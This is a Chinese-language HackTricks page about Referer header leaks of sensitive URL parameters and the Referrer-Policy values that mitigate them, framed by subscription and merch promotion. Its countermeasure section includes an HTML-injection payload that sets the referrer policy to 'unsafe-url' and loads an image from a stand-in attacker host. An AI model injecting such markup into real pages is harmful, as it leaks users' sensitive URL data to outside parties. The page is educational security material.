hacktricks/interesting-http.md

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一个网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！

• 发现我们的独家NFTs收藏品The PEASS Family

• 获得官方PEASS和HackTricks的衣物

• 加入 💬 Discord群组 或 电报群组 或 关注我在Twitter上的🐦@carlospolopm。

• 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。

引荐者头部和策略

引荐者是浏览器用来指示之前访问的页面的头部。

泄露的敏感信息

如果在网页中的某个位置存在任何敏感信息，例如GET请求参数，如果页面包含指向外部资源的链接，或者攻击者能够使/建议（社交工程）用户访问由攻击者控制的URL。攻击者可能能够在最新的GET请求中窃取敏感信息。

缓解措施

您可以让浏览器遵循一个引荐者策略，这可以避免将敏感信息发送给其他Web应用程序：

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

对策

您可以使用HTML元标签覆盖此规则（攻击者需要利用HTML注入）：

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

防御

永远不要将任何敏感数据放在URL的GET参数或路径中。

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一家网络安全公司工作吗？想要在HackTricks中看到你的公司广告吗？或者你想要访问PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！

• 发现我们的独家NFTs收藏品——The PEASS Family

• 获得官方PEASS和HackTricks周边产品

• 加入💬 Discord群组或电报群组，或者关注我在Twitter上的🐦@carlospolopm。

• 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。